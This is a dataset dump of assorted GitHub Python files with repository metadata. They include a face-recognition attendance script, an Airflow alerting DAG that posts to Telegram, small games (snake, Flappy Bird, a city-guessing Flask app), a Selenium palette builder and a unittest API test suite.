sa.Column('info', sa.String(length=64), nullable=True))\n op.create_index(op.f('ix_prototypes_body_hash'), 'prototypes', ['body_hash'], unique=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_prototypes_body_hash'), table_name='prototypes')\n op.drop_column('prototypes', 'info')\n op.drop_column('prototypes', 'body_hash')\n ### end Alembic commands ###\n","repo_name":"Weilor/poetbrain","sub_path":"migrations/versions/2e225df00b00_enhance_prototype_model.py","file_name":"2e225df00b00_enhance_prototype_model.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32214346373","text":"from FaceDetectionSSD import FaceDetectionSSD\nfrom Facenet import Facenet\nfrom ThreadedStreaming import WebcamVideoStream, FileVideoStream\nfrom threading import Thread\nfrom datetime import datetime\nfrom copy import deepcopy\nfrom framsdb import FRAMSDatabase\nimport utils as u\nimport cv2, numpy as np\nimport os\nimport imutils\nimport keyboard\n\nSOURCE_CAM = 0\nDEFAULT_THRESH = 0.75\nSKIP_FRAMES = 15\nDATA_DIR = \"data\"\nDISTANCE_FILE = os.path.join(DATA_DIR, \"distance.euc\")\nLABELS_FILE = os.path.join(DATA_DIR, \"embeddings.pkl\")\nCAM_FILE = os.path.join(DATA_DIR, \"vidconfig.txt\")\nCONFIG_FILE = os.path.join(DATA_DIR, \"config.txt\")\nDB_TIMESTAMP = 10\n\n\n#Initializing exit Thread\ndef exit_check(cams):\n global infinite # Loop variable\n input()\n for cam in cams:\n cam.stop()\n infinite = False\n print(\"[INFO] [recognize_multi.py] Processing stopped by user...\")\n # exit(0)\n\ndef mark_attendance(db, attendance_dict):\n if len(attendance_dict.keys()) > 0:\n values = []\n for key in attendance_dict.keys():\n for val in attendance_dict[key]:\n dt = val[\"dt\"].strftime(\"%Y/%m/%d\")\n tm = val[\"dt\"].strftime(\"%H:%M:%S\")\n dist = val[\"dist\"]\n values.append((key, 1,dt, tm, dist))\n\n rows = db.addAttendanceMulti(values)\n print(f\"{rows} inserted....\")\n\n\nu.file_check(DISTANCE_FILE, \"recognize_multi.py\", \"No User exists. Add a user...\")\nu.file_check(LABELS_FILE, \"recognize_multi.py\", \"User names not found...\")\nu.file_check(CAM_FILE, \"recognize_multi.py\", \"Cam file not found...\")\nu.file_check(CONFIG_FILE, \"recognize_multi.py\", \"Config file not found...\")\n\n\nannoy_object = u.load_index(DISTANCE_FILE)\nprint(\"[INFO] [recognize_multi.py] Distance file loaded...\")\n\nlabels = u.read_data(LABELS_FILE)[\"labels\"]\nprint(\"[INFO] [recognize_multi.py] Labels file loaded...\")\n\ncam_links = u.read_txtfile(CAM_FILE)\nprint(\"[INFO] [recognize_multi.py] cam file loaded...\")\n\nconfigs = eval(u.read_txtfile(CONFIG_FILE)[0])\nTIMESTAMP = configs[\"time_stamp\"]\ndbConfig = configs[\"db\"]\nhost, user, passwd, dbname = dbConfig[\"host\"], dbConfig[\"user\"], dbConfig[\"passwd\"], dbConfig[\"db\"]\nprint(\"[INFO] [recognize_multi.py] cam file loaded...\")\n\ndetector = FaceDetectionSSD()\nfacenet = Facenet()\ndb = FRAMSDatabase(host, user, passwd, dbname)\n\n\n# cams = [FileVideoStream(path=link, skip_frames=SKIP_FRAMES).start() for link in cam_links]\ncams = [\n WebcamVideoStream(src=eval(link), skip_frames=SKIP_FRAMES, time_stamp=TIMESTAMP).start() for link in cam_links\n ]\nlogs = {}\n\nif len(cams) > 0:\n print(f\"[INFO] [recognize_multi.py] Num of Cameras detected : {len(cams)}\")\nelse:\n print(f\"[ERROR] [recognize_multi.py] No cameras found...\")\n exit(1)\n\nif \"time_stamp\" in configs.keys():\n time_stamp = configs[\"time_stamp\"]\n print(f\"[INFO] [recognize_multi.py] Taking time stamp as {time_stamp} minutes...\")\nelse:\n time_stamp = 10\n print(\"[INFO] [recognize_multi.py] Taking Default time stamp as 10 minutes...\")\n\n# cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n# cap = cv2.VideoCapture(\"temp\\\\3.mp4\")\n# frames_list = []#########################\n\nThread(target=exit_check, args=(cams,), name='key_capture_thread', daemon=True).start()\n\n\ntry:\n infinite = True\n markAttStart = datetime.now()\n while infinite:\n camlinks_closed_count = 0\n # print(infinite)\n for ix, cam in enumerate(cams):\n # print(ix)\n \n # if cam.grabbed:\n if cam.more():\n frame_time, frame = cam.read()\n face_locations = detector.detect_faces(frame)\n\n if len(face_locations) > 0:\n detected_faces = detector.extract_faces(frame, face_locations)\n embeddings = facenet.get_embeddings(detected_faces)\n if embeddings is not None:\n predictions = u.get_predictions(embeddings, annoy_object, labels, DEFAULT_THRESH)\n \n for pred in predictions:\n stuID = pred[0]\n dist = pred[1]\n if stuID != \"Unknown\":\n log = f\"{frame_time} -- {stuID} - {dist}\"\n print(log)\n # day = frame_time.date().strftime(\"%d/%m/%Y\")\n # tm = frame_time.time().strftime(\"%H:%M:%S\")\n if stuID not in logs.keys():\n logs[stuID] = [{\"dt\":frame_time, \"dist\":dist}]\n else:\n lastLog = logs[stuID][-1]\n minutes = int((frame_time - lastLog[\"dt\"]).total_seconds()//60)\n \n if minutes >= TIMESTAMP : \n logs[stuID].append({\"dt\":frame_time, \"dist\":dist})\n \n frame = u.draw_predictions(frame, face_locations, predictions)\n\n # frame = imutils.resize(frame, width=min(480, frame.shape[1]))\n # frames_list.append(frame) #########################\n cv2.imshow(f\"{ix}\", frame)\n\n if cv2.waitKey(1) == 13 or camlinks_closed_count == len(cams):\n print(\"[INFO] [recognize_multi.py] Processing stopped by user...\")\n for cam in cams:\n cam.stop()\n infinite = False\n\n if int((datetime.now() - markAttStart).total_seconds()//60) >= DB_TIMESTAMP:\n logsCP = deepcopy(logs)\n # Thread(target=mark_attendance, args=(db, logsCP), name='key_capture_thread').start()\n mark_attendance(db, logsCP)\n markAttStart = datetime.now()\n logs = {}\n \n\n\n\n else:\n pass\n # print(f\"[INFO] [recognize_multi.py] Video frame not available : cam-index {ix} -- {cam_links[ix]}\")\n # cam.stop()\n # camlinks_closed_count += 1\n # if camlinks_closed_count == len(cams):\n # for cam in cams:\n # cam.stop()\n # infinite = False\n # u.writeVideo(\"data\\\\3.mp4\", frames_list, 4)##################################\n \n \n \nexcept Exception as e:\n print(f\"[ERROR] [recognize_multi.py] : {e}\")\nfinally:\n print(\"[INFO] [recognize_multi.py] Inside Finally Block...\")\n cv2.destroyAllWindows()\n # Printing Logs of different cameras\n for key in logs.keys():\n print(key,logs[key])\n \n mark_attendance(db, logs)\n db.close()\n","repo_name":"shahumang19/FR-SAS","sub_path":"recognize_multi.py","file_name":"recognize_multi.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74194908645","text":"from PIL import Image, ImageDraw\nimport random\nzebra = Image.open(\"zebra.jpg\")\nphoto = Image.open(\"photo.png\")\nsample = Image.open(\"green-screen.jpg\")\nphoto1 = Image.open(\"thatme.jpg\")\nphoto2 = Image.open(\"photo2.jpg\")\nohno = Image.open(\"ohno.jpg\")\nbeach = Image.open(\"beach.jpg\")\ntest = Image.open(\"test.png\")\ncroptest = Image.open(\"testForCropping.png\")\n\n\n\ndef transparency(image):\n image = image.convert(\"RGBA\")\n pixdata = image.load()\n for y in xrange(image.size[1]):\n for x in xrange(image.size[0]):\n if pixdata[x, y] == (0, 255, 0, 255):\n pixdata[x, y] = (255, 255, 255, 0)\n image.show()\n image.save(\"img2.png\", \"PNG\")\n\n#YESSSS IT WORKS\n#Code credit: http://stackoverflow.com/questions/765736/using-pil-to-make-all-white-pixels-transparent \n","repo_name":"lampridiforme/SPIS15-Project-Graphics-Christine-Zoe","sub_path":"transparency.py","file_name":"transparency.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33819294696","text":"from datetime import datetime, timedelta\nimport pandas as pd\nfrom airflow.decorators import dag, task\nfrom airflow.operators.python import get_current_context\nimport pandahouse as ph\nimport telegram\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport io\n\n# вставить токен для бота\nmy_token = 'my_token' \n\n# устанавливаем connection\nconnection = {'host': 'https://clickhouse.lab.karpov.courses',\n 'database':'simulator_20221120',\n 'user':'USER', \n 'password':'PASSWORD'\n }\n\ndefault_args = {\n 'owner': 'd-merinov-24',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 12, 16)\n }\n\nschedule_interval = '15 * * * *'\n\n@dag(default_args=default_args, schedule_interval=schedule_interval, catchup=False)\ndef lesson_8_dag_merinov():\n \n\n @task()\n def run_alerts(chat=None):\n\n \"\"\"\n функция детектирует аномалии в данных, при обнаружении анаомалии составляет отчет и график, которые отправляет сообщением в чат в телеграм\n chat: str,\n id чата в телеграм\n \"\"\"\n \n my_token = 'my_token' \n chat_id = 'MY_CHAT_ID' \n bot = telegram.Bot(token=my_token)\n \n \n def check_anomaly(df, metric, a=4, n=5):\n\n \"\"\"\n функция предлагает алгоритм проверки значения на аномальность посредством\n df: pandas.DataFrame\n датафрейм для проведения поиска аномалий\n metric: str\n метрика, по которой ищем аномалии\n a: int\n коэффициент межквартильного размаха\n n: int\n размер окна для скользящей средней\n \"\"\"\n\n df['q25'] = df[metric].shift(1).rolling(n).quantile(0.25)\n df['q75'] = df[metric].shift(1).rolling(n).quantile(0.75)\n df['iqr'] = df['q75'] - df['q25']\n df['upper'] = df['q75'] + a * df['iqr']\n df['lower'] = df['q25'] - a * df['iqr']\n\n\n df['upper'] = df['upper'].rolling(n, center=True, min_periods=1).mean()\n df['lower'] = df['lower'].rolling(n, center=True, min_periods=1).mean()\n\n if df[metric].iloc[-1] < df['lower'].iloc[-1] or df[metric].iloc[-1] > df['upper'].iloc[-1]:\n is_alert = 1\n else:\n is_alert = 0\n\n return is_alert, df\n\n query = ''' with feed as (\n SELECT\n toStartOfFifteenMinutes(time) as ts\n , toDate(ts) as date\n , formatDateTime(ts, '%R') as hm\n , uniqExact(user_id) as users_lenta,\n countIf(user_id, action='like') as likes,\n countIf(user_id, action='view') as views,\n likes / views as ctr\n FROM simulator_20221120.feed_actions l\n WHERE ts >= today() - 1 and ts < toStartOfFifteenMinutes(now())\n GROUP BY ts, date, hm\n ORDER BY ts), \n message as (\n SELECT\n toStartOfFifteenMinutes(time) as ts\n , toDate(ts) as date\n , formatDateTime(ts, '%R') as hm\n , count(user_id) as messages\n FROM simulator_20221120.message_actions\n WHERE ts >= today() - 1 and ts < toStartOfFifteenMinutes(now())\n GROUP BY ts, date, hm\n ORDER BY ts)\n\n SELECT l.*, r.messages FROM feed AS l\n JOIN message as r ON l.ts = r.ts AND\n l.date = r.date AND\n l.hm = r.hm\n '''\n data = ph.read_clickhouse(query=query, connection=connection)\n\n metric_list = ['users_lenta', 'likes', 'views', 'ctr', 'messages']\n for metric in metric_list:\n df = data[['ts', 'date', 'hm', metric]].copy()\n is_alert, df = check_anomaly(df, metric) \n\n if is_alert == 1:\n current_value = float(df[metric].iloc[-1])\n last_value = float(df[metric].iloc[-2])\n diff = (current_value -last_value) / last_value * 100\n \n msg = f'''Метрика {metric}:\\n текущее значение = {round(current_value,2):}\\n отклонение от пред. значения: {round(diff,2)}% \n https://superset.lab.karpov.courses/superset/dashboard/2390/'''\n\n sns.set(rc={'figure.figsize': (16, 10)}) # задаем размер графика\n plt.tight_layout()\n\n ax = sns.lineplot(x=df['ts'], y=df[metric], label='metric')\n ax = sns.lineplot(x=df['ts'], y=df['upper'], label='upper')\n ax = sns.lineplot(x=df['ts'], y=df['lower'], label='lower') \n\n for ind, label in enumerate(ax.get_xticklabels()): \n if ind % 2 == 0:\n label.set_visible(True)\n else:\n label.set_visible(False)\n ax.set(xlabel='time') # задаем имя оси Х\n ax.set(ylabel=metric) # задаем имя оси У\n\n ax.set_title('{}'.format(metric)) # задае заголовок графика\n ax.set(ylim=(0, None)) # задаем лимит для оси У\n\n\n plot_object = io.BytesIO()\n ax.figure.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = '{0}.png'.format(metric)\n plt.close()\n\n\n bot.sendMessage(chat_id=chat_id, text=msg)\n bot.sendPhoto(chat_id=chat_id, photo=plot_object)\n\n run_alerts()\n\nlesson_8_dag_merinov = lesson_8_dag_merinov()\n","repo_name":"GLaDOS070/educational_projects","sub_path":"alerts/lesson_8_dag.py","file_name":"lesson_8_dag.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32585388914","text":"#Задайте список из N элементов, заполненных числами из промежутка [-N, N]. Найдите произведение элементов на указанных позициях. Позиции хранятся в файле file.txt в одной строке одно число.\n#Реализуйте алгоритм перемешивания списка.\n\narr = [int(input('Введите элемент списка: ')) \nfor i in range(int(input('Введите длину списка: ')))]\nprod = 1\nfor i in arr:\n prod *= i\n \nprint(f'Весь список: {arr}')\nprint(f'Сумма элементов списка равна: {sum(arr)}')\nprint(f'Произведение элементов списка: {prod}')\n","repo_name":"Ant010603/Home_Work-Prthon-2","sub_path":"Home_Work4.py","file_name":"Home_Work4.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36486416159","text":"import os\nfrom flask import Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\n\nimport requests\nimport random\n\n# Configure application\napp = Flask(__name__)\n#app.run(debug=True, port 8000)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\ncity_name = ''\nstreak = 0\n\n# NEW\n# Define the grid size\nGRID_SIZE = 4\n\n# Create a grid of buttons\nbuttons = [[False for _ in range(GRID_SIZE)] for _ in range(GRID_SIZE)]\n\n\n@app.after_request\ndef after_request(response):\n \"\"\"Ensure responses aren't cached\"\"\"\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html', buttons = buttons)\n\n@app.route('/button_click', methods=['POST'])\ndef button_click():\n # Get the coordinates of the clicked button from the request\n row = int(request.form['row'])\n col = int(request.form['col'])\n\n # Check if the coordinates are within the valid range\n if 0 <= row < GRID_SIZE and 0 <= col < GRID_SIZE:\n # Change the color of the clicked button\n buttons[row][col] = not buttons[row][col]\n\n return ''\n@app.route(\"/about\", methods=[\"GET\", \"POST\"])\ndef about():\n return render_template('about.html')\n\n@app.route(\"/playgame\", methods=[\"GET\", \"POST\"])\ndef playgame():\n with open(\"database.csv\", 'r') as f:\n n = f.readlines()\n global city_name\n global streak\n\n if request.method == 'GET':\n city_num = random.randint(1,100)\n city = n[city_num].strip().split(',')\n\n city_name = city[1]\n city_funfact = city[2]\n city_state = city[3]\n pop_2020 = city[7]\n land_area_sqm = city[11]\n \n return render_template('playgame.html', city_funfact = city_funfact, city_state = city_state, pop_2020 = pop_2020, land_area_sqm = land_area_sqm, city_name = city_name)\n\n elif request.method == 'POST':\n print(streak)\n query = str(request.form.get(\"guess\"))\n\n\n if query == city_name:\n streak += 1\n return render_template('congrats.html', streak = streak)\n else:\n temp = streak\n streak = 0\n return render_template('wrong.html', city_name = city_name, streak = temp)\n\n\n\n\n\n\nif __name__==\"__main__\":\n app.run(host=os.getenv('IP', '127.0.0.1'),\n port=int(os.getenv('PORT', 5000)))","repo_name":"madelynxmao/4-color","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36768925252","text":"import copy\nimport random\nfrom threading import Lock\n\n\nclass SingletonMeta(type):\n _instances = {}\n _lock: Lock = Lock()\n\n def __call__(cls, *args, **kwargs):\n with cls._lock:\n if cls not in cls._instances or args or kwargs:\n instance = super().__call__(*args, **kwargs)\n cls._instances[cls] = instance\n return cls._instances[cls]\n\n\nclass SnakeTheGame(metaclass=SingletonMeta):\n\n class Snake:\n\n def __init__(self):\n self.length = 2\n self.head_position = [1, 1]\n self.body_position = [[0, 1]]\n\n def move_body(self, meal_position):\n if self.head_position != meal_position:\n self.body_position.pop()\n self.body_position.insert(0, copy.deepcopy(self.head_position))\n\n def step_left(self):\n self.head_position[0] -= 1\n\n def step_right(self):\n self.head_position[0] += 1\n\n def step_up(self):\n self.head_position[1] -= 1\n\n def step_down(self):\n self.head_position[1] += 1\n\n def __init__(self, height=10, width=15, type_of_game=\"step\", field_is_infinity=True):\n self.height = height\n self.width = width\n self.type_of_game = type_of_game\n self.field_is_infinity = field_is_infinity\n self.snake = self.Snake()\n self.meal_position = self.get_meal_position()\n self.is_end = False\n\n def get_meal_position(self):\n pos = [random.randint(0, self.width-1), random.randint(0, self.height-1)]\n if pos in self.snake.body_position or pos == self.snake.head_position:\n return self.change_meal_position()\n return pos\n\n def change_meal_position(self):\n self.meal_position = self.get_meal_position()\n if self.meal_position in self.snake.body_position or self.meal_position == self.snake.head_position:\n return self.change_meal_position()\n\n def snake_move(self, direction):\n direction_dict = {\n \"up\": self.snake.step_up,\n \"down\": self.snake.step_down,\n \"right\": self.snake.step_right,\n \"left\": self.snake.step_left\n }\n self.snake.move_body(self.meal_position)\n if self.snake.head_position == self.meal_position:\n self.change_meal_position()\n self.snake.length += 1\n direction_dict[direction]()\n # Условие поражения при наступлении на себя\n if self.snake.head_position in self.snake.body_position:\n self.is_end = True\n # Если поле бесконечно, то змейка ходит сквозь стены, если нет, то умирает\n if self.snake.head_position[0] >= self.width or self.snake.head_position[1] >= self.height\\\n or self.snake.head_position[0] < 0 or self.snake.head_position[1] < 0:\n if self.field_is_infinity:\n self.snake.head_position[0] = self.snake.head_position[0] % self.width\n self.snake.head_position[1] = self.snake.head_position[1] % self.height\n else:\n self.is_end = True\n","repo_name":"skirdapa/Stepic_Mini-Project_Snake","sub_path":"project/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13528027339","text":"# import everything that I will need\r\nimport colorgram\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\n\r\n# Make a function to convert rgb to hexcode. Colorgram will give me colors in RGB, but when I have selenium go to\r\n# colorhunt it wil require inputs in hexcode.\r\ndef rgb2hex(r, g, b):\r\n return \"#{:02x}{:02x}{:02x}\".format(r, g, b)\r\n\r\n\r\n# Use a for loop with colorgram and the rgb2hex function to create a list of hexvalues based on the image\r\n# 'Watermelon.jpeg'\r\nhex_colors = []\r\ncolors = colorgram.extract('Watermelon.jpg', 4)\r\n\r\nfor color in colors:\r\n r = color.rgb.r\r\n g = color.rgb.g\r\n b = color.rgb.b\r\n hex_color = rgb2hex(r, g, b)\r\n hex_colors.append(hex_color)\r\n\r\n# I had the program print the list of hexcodes so that I could manually check that the program was working properly, but\r\n# after I ran some test I commented it out\r\n\r\n# print(hex_colors)\r\n\r\n# Set up my driver and ActionChains since I will need to do that\r\nchromedriver_path = \"C:/Users/Winny/Desktop/Web_Development/chromedriver.exe\"\r\ns = Service(chromedriver_path)\r\ndriver = webdriver.Chrome(service=s)\r\nac = ActionChains(driver)\r\n\r\n# Have Selenium go to colorhunt's create a palette page.\r\ndriver.get(\"https://colorhunt.co/create\")\r\n\r\n# Make the first tile on the palette change colors to the first hexcode value in my list.\r\ntile1 = driver.find_element(By.XPATH, \"/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/div[4]\")\r\ntile1.click()\r\ncolor_selector = driver.find_element(By.ID, 'colorInput')\r\ncolor_selector.clear()\r\ncolor_selector.send_keys(hex_colors[0])\r\ncolor_selector.send_keys(Keys.RETURN)\r\n\r\n# Make the second tile on the palette change colors to the second hexcode value on my list.\r\n# Because the tile elements overlap each other, Selenium was giving me an ElementNotSelectableException.\r\n# To circumvent the exception I used ActionChains to click on a specific point of the webpage that would allow me to\r\n# click on the second color palette tile.\r\ntile2 = driver.find_element(By.XPATH, \"/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/div[3]\")\r\nac.move_to_element(tile2).move_by_offset(0, 100).click().perform()\r\ncolor_selector = driver.find_element(By.ID, 'colorInput')\r\ncolor_selector.clear()\r\ncolor_selector.send_keys(hex_colors[1])\r\ncolor_selector.send_keys(Keys.RETURN)\r\n\r\n# Make the 3rd tile on the palette change colors to the third hexcode value on my list.\r\n# Similar to tile2. I needed to use ActionChains to avoid the ElemenentNotSelectableException, but I realized I could\r\n# click on tile3 in the website using the same locator tile2, so no need to find a new element, I only have to change\r\n# the move_by_offset y value.\r\nac.move_to_element(tile2).move_by_offset(0, 150).click().perform()\r\ncolor_selector = driver.find_element(By.ID, 'colorInput')\r\ncolor_selector.clear()\r\ncolor_selector.send_keys(hex_colors[2])\r\ncolor_selector.send_keys(Keys.RETURN)\r\n\r\n# Make the 4th tile the final color. Done with the same process as the 3rd tile.\r\ntile2 = driver.find_element(By.XPATH, \"/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/div[3]\")\r\nac.move_to_element(tile2).move_by_offset(0, 210).click().perform()\r\ncolor_selector = driver.find_element(By.ID, 'colorInput')\r\ncolor_selector.clear()\r\ncolor_selector.send_keys(hex_colors[3])\r\ncolor_selector.send_keys(Keys.RETURN)\r\n\r\n# I need a way to make sure that Selenium doesn't close the window before I am able to view it, so I created an\r\n# input function to prompt the user to answer if they like it. Once answered the program will finish running.\r\ninput(\"Do you like your palette? Yes or No: \")\r\n\r\ndriver.quit()\r\n\r\n","repo_name":"wlkiepe/ColorPaletteGenerator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35611765348","text":"import utilities\nfrom functools import reduce\n\nclass radixAccum:\n translate = {'A':0, 'C':1, 'G':2, 'T':3}\n \n def __init__(self, radix):\n self.radix = radix\n self.columnValue = 1\n \n def calculate(self, letter):\n number = self.translate[letter] * self.columnValue\n self.columnValue *= self.radix\n return int(number) \n\ndef patternToNum(pattern, accum):\n return reduce(lambda x, y: int(x) + accum.calculate(y), pattern)\n\nwith open('patternToNum.txt', 'r') as infile:\n pattern = '0' + infile.readline().strip().upper()[::-1]\n accum = radixAccum(4)\n value = patternToNum(pattern, accum)\n print(value)\n\nwith open('patternToNum.results.txt','w') as outfile:\n outfile.write(str(value))\n","repo_name":"judebattista/CS355_Homework","sub_path":"hw04/patternToNum.py","file_name":"patternToNum.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10374949395","text":"import random\n\ntest_seed = int(input(\"Create a seed number: \"))\nrandom.seed(test_seed)\n\n# Split string method\nnamesAsCSV = input(\"Give me everybody's names, seperated by a comma. \")\nnames = namesAsCSV.split(\", \")\n\nlength_of_names = len(names)\n\n# bill_payee = random.randrange(-1, length_of_names)\n#print(f\"{names[bill_payee]} has to pay the bill.\")\n\nbill_choice = random.randint(0, length_of_names - 1)\n\nbill_payee = names[bill_choice]\nprint(f\"{bill_payee} is going to buy the meal today!\")\n\n\n# random.choice() would be better for all of this.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"SimonMably/100_Days_of_Code","sub_path":"day_4/banker_roulette.py","file_name":"banker_roulette.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21389939702","text":"import pygame\nimport random\n\nfrom version_1.app_rects_funcs import place_block, create_block\n\n\npygame.init()\nclock = pygame.time.Clock()\n\n# Sizes, colors and font\nSCREEN_WIDTH, SCREEN_HEIGHT = 500, 600\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nSKY = (102, 123, 249)\nFONT = pygame.font.Font(\"freesansbold.ttf\", 22)\nGAME_OVER_TEXT = FONT.render(\"GAME OVER\", False, WHITE, BLACK)\n\n# Screen settings\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Flappy bird\")\nicon = pygame.image.load(\"media/logo.jpg\")\npygame.display.set_icon(icon)\n\n# Create player/bird (left, top, width, height)\nbird = pygame.Rect(100, SCREEN_HEIGHT/2 - 5, 20, 20)\nbird_speed = 2\njumping = False\n\n# Create buildind blocks \nblock_total_height = 500\nblock_1 = create_block(SCREEN_WIDTH)\nblock_2 = create_block(SCREEN_WIDTH + 300)\nblocks = block_1 + block_2\nblock_speed = 1\n\n# Create point\nscore = 0\ncoin_1 = pygame.Rect(block_1[0].left + 30, block_1[0].height + 45, 10, 10)\ncoin_2 = pygame.Rect(block_2[0].left + 30, block_2[0].height + 45, 10, 10)\n\n# Draw floor (surface, color, start_pos, end_pos, width)\nfloor = pygame.draw.line(screen, WHITE, (0, SCREEN_HEIGHT - 100), (SCREEN_WIDTH, SCREEN_HEIGHT - 100), width=5)\n\n# So user can't jump anymore\ngame_over = False\n\nrunning = True\nwhile running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and not game_over:\n start_of_jump = pygame.time.get_ticks()\n jumping = True\n\n\n # Draw into the screen\n screen.fill(SKY)\n pygame.draw.rect(screen, WHITE, bird)\n pygame.draw.rect(screen, WHITE, floor)\n for block in blocks:\n pygame.draw.rect(screen, WHITE, block)\n pygame.draw.rect(screen, WHITE, coin_1)\n pygame.draw.rect(screen, WHITE, coin_2)\n\n # If bird jumps\n if jumping:\n end_of_jump = pygame.time.get_ticks()\n bird.y -= 4\n\n if end_of_jump - start_of_jump >= 200:\n jumping = False\n else:\n bird.y += bird_speed\n \n block_1[0].x -= block_speed\n block_1[1].x -= block_speed\n block_2[0].x -= block_speed\n block_2[1].x -= block_speed\n coin_1.x -= block_speed\n coin_2.x -= block_speed\n\n # If blocks go out of the screen\n if block_1[0].x and block_1[1].x <= -70:\n place_block(block_1[0], block_1[1], SCREEN_WIDTH)\n coin_1.left = block_1[0].left + 30\n coin_1.top = block_1[0].height + 45\n\n if block_2[0].x and block_2[1].x <= -70:\n place_block(block_2[0], block_2[1], SCREEN_WIDTH)\n coin_2.left = block_2[0].left + 30\n coin_2.top = block_2[0].height + 45\n\n\n # If player touches floor or building blocks\n if bird.colliderect(block_1[0]) or bird.colliderect(block_1[1]) or \\\n bird.colliderect(block_2[0]) or bird.colliderect(block_2[1]) or \\\n bird.colliderect(floor):\n\n bird_speed = 0\n block_speed = 0\n screen.blit(GAME_OVER_TEXT, (SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2))\n game_over = True\n \n if bird.colliderect(coin_1) or bird.colliderect(coin_2):\n score += 1\n if bird.colliderect(coin_1):\n coin_1.x = -10\n else:\n coin_2.x = -10\n\n score_text = FONT.render(f\"Score: {score}\", False, WHITE, BLACK)\n screen.blit(score_text, (20, 20))\n \n \n pygame.display.update()\n clock.tick(60)","repo_name":"amssdias/python-flappy-bird","sub_path":"flappy_bird_1.py","file_name":"flappy_bird_1.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37916498256","text":"import unittest\nfrom parameterized import parameterized\nfrom API_auto_day2.common.lesson_mange_api import LessonManagement\nfrom API_auto_day2.common.get_lesson_data import get_lesson_data\n\n# 使用unittest框架编写测试用例\nclass Test_lesson(unittest.TestCase):\n # 初始化,删除系统中增加的课程信息\n @classmethod\n def setUpClass(cls): # 表示在类执行之前执行\n LessonManagement.delete_all_lesson_data()\n\n # 善后操作\n @classmethod\n def tearDownClass(cls): # 表示 在类 执行之后 执行\n LessonManagement.delete_all_lesson_data()\n\n # 定义一个方法,增加课程信息\n @parameterized.expand(get_lesson_data(\"2-增加课程\"))\n def test_add_lesson(self, data, expected, tesecase_num, testcase_title):\n self._testMethodDoc = testcase_title # 加上这一行代码以后,把测试用例的标题编写在了 测试报告中的 “用例描述”列\n self._testMethodName = tesecase_num # 加上这一行代码以后,把测试用例的编号编写在了 测试报告中的 “测试方法”列\n # 实际响应的结果\n actual_result = LessonManagement.add_lesson_api(data)\n # 获取实际的响应结果中的 retcode 的值\n actual_retcode = actual_result[\"retcode\"]\n # 获取预期的响应结果中的 retcode 的值\n expected_retcode = expected[\"retcode\"]\n # 判断reason 是否在预期结果中,如果是 断言预期结果中的retcode 及 reason 和 实际结果中的 retcode 及 reason是否一致\n if \"reason\" in expected:\n # 获取预期结果中的 reason的值\n expected_reason = expected[\"reason\"]\n # 获取实际的响应结果中的 reason的值\n actual_reason = actual_result[\"reason\"]\n # 断言\n self.assertEqual(expected_retcode, actual_retcode)\n self.assertEqual(expected_reason, actual_reason)\n else:\n self.assertEqual(actual_retcode, expected_retcode, msg=f\"实际结果中的retcode的值为:{actual_retcode}\") # 